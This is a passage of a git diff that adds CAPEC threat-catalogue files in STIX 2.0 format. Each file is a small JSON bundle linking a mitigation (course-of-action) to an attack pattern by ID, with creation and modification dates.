"bundle--c08e3196-8c8b-4753-b239-76cc5137a5fd", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--aa8b1d29-f699-40ae-ae85-528d22562479", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--e56368a8-b58f-4640-a0b4-a8ca89ef10f7", + "target_ref": "attack-pattern--9e561f3e-1dc5-4db0-9fea-92bcb3b3f1c9", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--aacfa64c-2007-4b20-a791-3207866e0565.json b/capec/relationship/relationship--aacfa64c-2007-4b20-a791-3207866e0565.json new file mode 100644 index 0000000000..883846c513 --- /dev/null +++ b/capec/relationship/relationship--aacfa64c-2007-4b20-a791-3207866e0565.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--0bb9f56b-6182-415e-a543-a06329f1df42", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--aacfa64c-2007-4b20-a791-3207866e0565", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--9473c9f9-f260-4e7d-bbf6-bc227db41261", + "target_ref": "attack-pattern--16b1ed32-9de4-4d9a-aeda-760985551d69", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--ab4e9f7b-ce52-40e6-b090-746b9e36a5db.json b/capec/relationship/relationship--ab4e9f7b-ce52-40e6-b090-746b9e36a5db.json new file mode 100644 index 0000000000..3e19e014d6 --- /dev/null +++ b/capec/relationship/relationship--ab4e9f7b-ce52-40e6-b090-746b9e36a5db.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--146ee8ef-168d-479c-bcef-95cbb741b1b0", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--ab4e9f7b-ce52-40e6-b090-746b9e36a5db", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--2cdc30fb-468f-460e-995b-1f0e1827dc75", + "target_ref": "attack-pattern--738f95bd-2885-4cb4-a782-d1a58198d726", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--abe12e18-a9a3-45fa-be8f-aa5caad45774.json b/capec/relationship/relationship--abe12e18-a9a3-45fa-be8f-aa5caad45774.json new file mode 100644 index 0000000000..f6c64eafca --- /dev/null +++ b/capec/relationship/relationship--abe12e18-a9a3-45fa-be8f-aa5caad45774.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--972f9a66-4ae2-4107-83ba-9d071ec9d771", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--abe12e18-a9a3-45fa-be8f-aa5caad45774", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2018-07-31T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--e2ee1f2a-0265-4601-9703-d4a308c1f7ea", + "target_ref": "attack-pattern--83c111d0-0f3e-422c-ac73-819d29403c64", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--abf2549f-6e96-4043-b6dc-f2ad2ba3ea61.json b/capec/relationship/relationship--abf2549f-6e96-4043-b6dc-f2ad2ba3ea61.json new file mode 100644 index 0000000000..9e8e4f7bf3 --- /dev/null +++ b/capec/relationship/relationship--abf2549f-6e96-4043-b6dc-f2ad2ba3ea61.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--a200ac8e-e12f-46e7-928f-bcb65675758a", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--abf2549f-6e96-4043-b6dc-f2ad2ba3ea61", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--ab283457-b87f-426c-a8ca-40500059244b", + "target_ref": "attack-pattern--222cae7b-e00f-48e2-813a-efac031dfa65", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--abfc9759-5f7a-4248-b276-110e96beb9d8.json b/capec/relationship/relationship--abfc9759-5f7a-4248-b276-110e96beb9d8.json new file mode 100644 index 0000000000..f1ef72a164 --- /dev/null +++ b/capec/relationship/relationship--abfc9759-5f7a-4248-b276-110e96beb9d8.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--9b14336e-66b9-4735-bc54-2b7912ca1e4d", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--abfc9759-5f7a-4248-b276-110e96beb9d8", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2014-06-23T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--0b1d3e9d-f2a7-4762-8047-d770b6172d7c", + "target_ref": "attack-pattern--5000f07d-b0e2-48cc-bd4e-5149fa707e75", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--ac2fc394-d6b0-4a44-b765-9fe73123b253.json b/capec/relationship/relationship--ac2fc394-d6b0-4a44-b765-9fe73123b253.json new file mode 100644 index 0000000000..afac42802e --- /dev/null +++ b/capec/relationship/relationship--ac2fc394-d6b0-4a44-b765-9fe73123b253.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--0ba5adad-8c84-4dc3-bc50-4657133bf7de", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--ac2fc394-d6b0-4a44-b765-9fe73123b253", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--1eac470d-04ba-449c-b2d8-34fa512d4356", + "target_ref": "attack-pattern--28ca67a7-6c1e-4c2e-81d0-5b4b389e4ddd", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--ac38c85d-0695-4c49-8b5b-d3c521ec56dd.json b/capec/relationship/relationship--ac38c85d-0695-4c49-8b5b-d3c521ec56dd.json new file mode 100644 index 0000000000..590209f96e --- /dev/null +++ b/capec/relationship/relationship--ac38c85d-0695-4c49-8b5b-d3c521ec56dd.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--a7868087-e2f4-4fc0-bee4-353757a9a088", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--ac38c85d-0695-4c49-8b5b-d3c521ec56dd", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--ff8b5661-c55b-41a8-9267-9d3718ecaa03", + "target_ref": "attack-pattern--74014925-3a6e-48f7-b7ad-fde08bafdf19", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--ac4c7cbb-8bb1-4d48-bb09-24bd2867ec1c.json b/capec/relationship/relationship--ac4c7cbb-8bb1-4d48-bb09-24bd2867ec1c.json new file mode 100644 index 0000000000..5070c6afdf --- /dev/null +++ b/capec/relationship/relationship--ac4c7cbb-8bb1-4d48-bb09-24bd2867ec1c.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--a27d7b79-2216-444d-bc86-dc9ae100dc40", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--ac4c7cbb-8bb1-4d48-bb09-24bd2867ec1c", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-05-01T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--9e10d99c-ac01-427e-aee4-2df1aa87286a", + "target_ref": "attack-pattern--67562799-2d10-4e76-b3da-649c6d844340", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--ac81cf41-7bdc-4415-a2af-288452a727be.json b/capec/relationship/relationship--ac81cf41-7bdc-4415-a2af-288452a727be.json new file mode 100644 index 0000000000..d041fc1a67 --- /dev/null +++ b/capec/relationship/relationship--ac81cf41-7bdc-4415-a2af-288452a727be.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--d9de7fee-5158-4a3b-9a63-65c882b7e87b", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--ac81cf41-7bdc-4415-a2af-288452a727be", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--82e47eb6-c3ad-4ca2-896f-596bab562f50", + "target_ref": "attack-pattern--d771faeb-8b5c-40fd-ae05-663a55c61fbf", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--ad5a9c4f-dec3-41d6-b5af-dec89b0bf143.json b/capec/relationship/relationship--ad5a9c4f-dec3-41d6-b5af-dec89b0bf143.json new file mode 100644 index 0000000000..ec2c61ef99 --- /dev/null +++ b/capec/relationship/relationship--ad5a9c4f-dec3-41d6-b5af-dec89b0bf143.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--1141ee6b-8b1b-4bdb-a62c-3daf9f86e171", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--ad5a9c4f-dec3-41d6-b5af-dec89b0bf143", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2018-07-31T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--f7ad58c5-d680-449d-8437-2608358e11d3", + "target_ref": "attack-pattern--e74ee6db-63e0-427c-be03-ae2792d14c82", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--ad9f9eb4-b077-4187-b75e-5561e357dc68.json b/capec/relationship/relationship--ad9f9eb4-b077-4187-b75e-5561e357dc68.json new file mode 100644 index 0000000000..4b4867667c --- /dev/null +++ b/capec/relationship/relationship--ad9f9eb4-b077-4187-b75e-5561e357dc68.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--ca6ed35e-66fc-4bb3-8591-1bbe4e52fda0", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--ad9f9eb4-b077-4187-b75e-5561e357dc68", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2017-01-06T00:00:00.000Z", + "modified": "2017-01-06T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--1da8555a-673e-49d9-a3a6-fa1404b9d1a9", + "target_ref": "attack-pattern--9e330dfb-4bb5-4c37-8982-c931dbc285cb", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--adc43532-79b6-4deb-98eb-2200ee6be8e5.json b/capec/relationship/relationship--adc43532-79b6-4deb-98eb-2200ee6be8e5.json new file mode 100644 index 0000000000..15457ec517 --- /dev/null +++ b/capec/relationship/relationship--adc43532-79b6-4deb-98eb-2200ee6be8e5.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--ab6d8e86-8697-4e96-9622-706b231b7927", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--adc43532-79b6-4deb-98eb-2200ee6be8e5", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--108a12a8-aad4-460b-ba9c-77767c067d93", + "target_ref": "attack-pattern--86e31b64-8521-4fa2-ad2b-3ca2d036d398", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--adceacd0-9e5e-4879-9dfc-db9c1be833b9.json b/capec/relationship/relationship--adceacd0-9e5e-4879-9dfc-db9c1be833b9.json new file mode 100644 index 0000000000..4ce4010a7d --- /dev/null +++ b/capec/relationship/relationship--adceacd0-9e5e-4879-9dfc-db9c1be833b9.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--042df255-040f-4551-95fc-502fd56de28d", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--adceacd0-9e5e-4879-9dfc-db9c1be833b9", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-05-01T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--92b05087-a78f-4928-8c5c-cc61442394b7", + "target_ref": "attack-pattern--d47faea4-b41f-494f-ab97-0e69b3029095", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--ae108410-45fa-495c-8900-bdbbfb9b1fc6.json b/capec/relationship/relationship--ae108410-45fa-495c-8900-bdbbfb9b1fc6.json new file mode 100644 index 0000000000..72db43466e --- /dev/null +++ b/capec/relationship/relationship--ae108410-45fa-495c-8900-bdbbfb9b1fc6.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--f9135b78-09cc-4509-9bc9-54c7be811264", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--ae108410-45fa-495c-8900-bdbbfb9b1fc6", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-05-01T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--301e5bbb-d0b4-4c64-93b0-d83f7a317420", + "target_ref": "attack-pattern--67562799-2d10-4e76-b3da-649c6d844340", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--aedc6d88-0ce3-4a62-a4c0-8f223d460a4c.json b/capec/relationship/relationship--aedc6d88-0ce3-4a62-a4c0-8f223d460a4c.json new file mode 100644 index 0000000000..c4863f6870 --- /dev/null +++ b/capec/relationship/relationship--aedc6d88-0ce3-4a62-a4c0-8f223d460a4c.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--dcd95f70-06e8-477e-b0d2-d575f03e0733", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--aedc6d88-0ce3-4a62-a4c0-8f223d460a4c", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2015-11-09T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--691f66b9-07a3-4c94-8e66-2aa19dd6f99b", + "target_ref": "attack-pattern--d7f7daa0-0ea6-48f4-968c-b8e92c62f15a", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--b0af97af-2ac2-4d5a-8fb1-3cfaeedc6ee2.json b/capec/relationship/relationship--b0af97af-2ac2-4d5a-8fb1-3cfaeedc6ee2.json new file mode 100644 index 0000000000..37d4d303ce --- /dev/null +++ b/capec/relationship/relationship--b0af97af-2ac2-4d5a-8fb1-3cfaeedc6ee2.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--c8f0cade-9d86-4a1c-ae16-b456252d240e", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--b0af97af-2ac2-4d5a-8fb1-3cfaeedc6ee2", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2018-05-31T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--4d92cf6d-e95c-427c-89c7-31a58f807f99", + "target_ref": "attack-pattern--62ee09d6-0723-472f-9173-8bd1092cc077", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--b0bb3dd2-e5e1-4b91-ace3-c6db22d9d1a2.json b/capec/relationship/relationship--b0bb3dd2-e5e1-4b91-ace3-c6db22d9d1a2.json new file mode 100644 index 0000000000..d5b6ae60db --- /dev/null +++ b/capec/relationship/relationship--b0bb3dd2-e5e1-4b91-ace3-c6db22d9d1a2.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--8df8db2e-d803-46af-9b28-df3ec28e3923", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--b0bb3dd2-e5e1-4b91-ace3-c6db22d9d1a2", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2018-05-31T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--501aa08c-8325-4076-945a-95272170d1b9", + "target_ref": "attack-pattern--1fd71a54-9d48-4adb-805d-11e5498f6242", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--b12d3857-9aea-4d9b-b610-b8f2ab7a77ef.json b/capec/relationship/relationship--b12d3857-9aea-4d9b-b610-b8f2ab7a77ef.json new file mode 100644 index 0000000000..be692c0d56 --- /dev/null +++ b/capec/relationship/relationship--b12d3857-9aea-4d9b-b610-b8f2ab7a77ef.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--8ea92df7-a7a3-4889-a8b8-d932d689a5b0", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--b12d3857-9aea-4d9b-b610-b8f2ab7a77ef", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2015-11-09T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--bb6c6e5d-5144-4ef1-8f27-669fe1fddc21", + "target_ref": "attack-pattern--24db550f-2f72-42a7-ba11-0050f9180eaa", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--b146ae5b-3105-49dd-946f-8ad19f54a35a.json b/capec/relationship/relationship--b146ae5b-3105-49dd-946f-8ad19f54a35a.json new file mode 100644 index 0000000000..263faa44b8 --- /dev/null +++ b/capec/relationship/relationship--b146ae5b-3105-49dd-946f-8ad19f54a35a.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--ae88d7b5-a3de-473b-ae2d-c04b4906d3fd", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--b146ae5b-3105-49dd-946f-8ad19f54a35a", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--3093ecc0-8588-4daa-b7a1-9aaeb6a93daa", + "target_ref": "attack-pattern--9484743d-53ab-4f6f-81e9-cde4ac98307b", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--b1906b70-d693-4d9b-bd12-ac22eb49e5fe.json b/capec/relationship/relationship--b1906b70-d693-4d9b-bd12-ac22eb49e5fe.json new file mode 100644 index 0000000000..5768cbd88b --- /dev/null +++ b/capec/relationship/relationship--b1906b70-d693-4d9b-bd12-ac22eb49e5fe.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--d9882617-7581-48fe-909c-45bd050126fc", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--b1906b70-d693-4d9b-bd12-ac22eb49e5fe", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-05-01T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--8bfe4f1a-bebf-4ed7-9bff-2316e1882b77", + "target_ref": "attack-pattern--1408a566-eced-4d5d-aa0d-a7b373e80ea6", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--b2123192-f6e4-4402-b8aa-3256e75fb07c.json b/capec/relationship/relationship--b2123192-f6e4-4402-b8aa-3256e75fb07c.json new file mode 100644 index 0000000000..fa3f9aeccf --- /dev/null +++ b/capec/relationship/relationship--b2123192-f6e4-4402-b8aa-3256e75fb07c.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--2e522d78-f28c-4579-9d96-01d06265f675", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--b2123192-f6e4-4402-b8aa-3256e75fb07c", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--2786b040-a5e9-4b8f-9fe9-e8fbd043985e", + "target_ref": "attack-pattern--c29999db-082a-4dff-b420-73f324a13bc1", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--b2f2e038-a80c-4cf3-b3b0-bfc4279080a0.json b/capec/relationship/relationship--b2f2e038-a80c-4cf3-b3b0-bfc4279080a0.json new file mode 100644 index 0000000000..41263c89a1 --- /dev/null +++ b/capec/relationship/relationship--b2f2e038-a80c-4cf3-b3b0-bfc4279080a0.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--886f6a4b-d6cb-461e-91de-86db8b46746d", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--b2f2e038-a80c-4cf3-b3b0-bfc4279080a0", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2017-01-06T00:00:00.000Z", + "modified": "2017-01-06T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--60e5864c-2b6e-4ac0-8bdd-82ecc4047c38", + "target_ref": "attack-pattern--9e330dfb-4bb5-4c37-8982-c931dbc285cb", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--b32b8dd1-e256-46d1-843f-7a038a0c9afb.json b/capec/relationship/relationship--b32b8dd1-e256-46d1-843f-7a038a0c9afb.json new file mode 100644 index 0000000000..3fc2b6758e --- /dev/null +++ b/capec/relationship/relationship--b32b8dd1-e256-46d1-843f-7a038a0c9afb.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--8979469d-9f98-4790-a130-251aa7c37c2b", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--b32b8dd1-e256-46d1-843f-7a038a0c9afb", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--f8cad512-fad0-4c0f-aba9-490764a895d2", + "target_ref": "attack-pattern--34f01011-987b-4447-8663-e32f695409cc", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--b3400a5a-bf24-45d1-942d-423db78369c8.json b/capec/relationship/relationship--b3400a5a-bf24-45d1-942d-423db78369c8.json new file mode 100644 index 0000000000..fcb062f266 --- /dev/null +++ b/capec/relationship/relationship--b3400a5a-bf24-45d1-942d-423db78369c8.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--7ce05389-c171-4f64-8c46-1f87a9560adf", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--b3400a5a-bf24-45d1-942d-423db78369c8", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--d2b5aa10-ee2b-4e45-ba0e-3ef17369b50f", + "target_ref": "attack-pattern--1a0c16aa-ba23-4997-a370-8a30c69f41c0", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--b351048d-671f-4e59-8dfd-d6c494ec0a3d.json b/capec/relationship/relationship--b351048d-671f-4e59-8dfd-d6c494ec0a3d.json new file mode 100644 index 0000000000..b6f857a9b9 --- /dev/null +++ b/capec/relationship/relationship--b351048d-671f-4e59-8dfd-d6c494ec0a3d.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--a4fcb221-9ace-4e0a-8100-496cf7ff7200", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--b351048d-671f-4e59-8dfd-d6c494ec0a3d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--29a42808-e171-48df-affd-22dfaa3718b1", + "target_ref": "attack-pattern--2e72ce44-c580-471c-a9ac-6e6a600b67b2", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--b3801462-8d46-4a12-8f43-022579f9a1d1.json b/capec/relationship/relationship--b3801462-8d46-4a12-8f43-022579f9a1d1.json new file mode 100644 index 0000000000..056a89ca20 --- /dev/null +++ b/capec/relationship/relationship--b3801462-8d46-4a12-8f43-022579f9a1d1.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--07913c5f-0380-437c-9833-712ecc0fb4a4", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--b3801462-8d46-4a12-8f43-022579f9a1d1", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--d3f0fa85-f178-41f3-8f8b-b572611e3396", + "target_ref": "attack-pattern--bc7b8c08-6c6e-42fd-9c78-be5ed35d8ecb", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--b3e1c5c7-5f3b-41e2-9fe4-f5bea1789010.json b/capec/relationship/relationship--b3e1c5c7-5f3b-41e2-9fe4-f5bea1789010.json new file mode 100644 index 0000000000..6703bc8009 --- /dev/null +++ b/capec/relationship/relationship--b3e1c5c7-5f3b-41e2-9fe4-f5bea1789010.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--26b58890-8a3e-4921-96c2-f613690f27e4", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--b3e1c5c7-5f3b-41e2-9fe4-f5bea1789010", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--931ea671-4821-49f8-a9d3-4d9b79162aa7", + "target_ref": "attack-pattern--bded7a75-5d5c-4d00-b403-d840f6631823", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--b3f766e9-52da-4e96-b4e2-ceabba6c233c.json 